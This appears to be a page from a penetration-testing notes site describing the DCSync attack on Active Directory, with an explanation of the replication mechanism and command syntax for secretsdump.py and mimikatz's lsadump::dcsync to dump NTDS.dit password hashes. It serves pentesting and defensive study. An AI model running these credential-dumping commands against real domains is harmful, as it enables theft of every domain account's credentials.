DCSync

DCSync is an attack that allows attackers to simulate a new Domain Controller on the domain to replicate sensitive information such as password hashes from the NTDS.dit file.

An account on the target domain with Replicate Directory Changes rights is required in order to attempt a DC Sync attack.

By default, domain administrators, enterprise administrators, and domain controllers have Replicate Directory Changes rights. However, I've run into cases where non-privileged accounts are accidentally given these rights.

This attack relies on the Microsoft Directory Replication Service (DRSUAPI), which uses the Directory Replication Service Remote (MS-DRSR) protocol to replicate from Domain Controllers.

The attacker uses the DSGetNCChanges function in DRSUAPI to request information about AD Objects from a legitimate Domain Controller, and the legitimate Domain Controller responds with a structure that contains replication information, such as usernames and password hashes.

Exploit

Linux

secretsdump.py [domain/username]<:password> <options>

OPTIONS
-just-dc                    Extract Only NTDS.dit Data (NTLM/Kerberos Keys)
-just-dc-ntlm               Extract Only NTDS.dit Data (NTLM Only)
-just-dc-user [username]    Extract Only NTDS.dit Data For Specified User
-user-status                Display If The User Is Disabled
-history                    Dump Password History
-outputfile                 Base Output Filename

-hashes                     Authenticate Using LMHASH:NTHASH
-k                          Use Kerberos Auth From ccache File

Linux/Windows

lsadump::dcsync <options>

OPTIONS
/domain:[domain]        Domain
/user:[user]            Target Domain User To Obtain Credentials For
/dc:[DC FDQN]           Domain Controller To Target

PreviousNTDS.dit NextVolume Shadow Copy

Last updated 1 year ago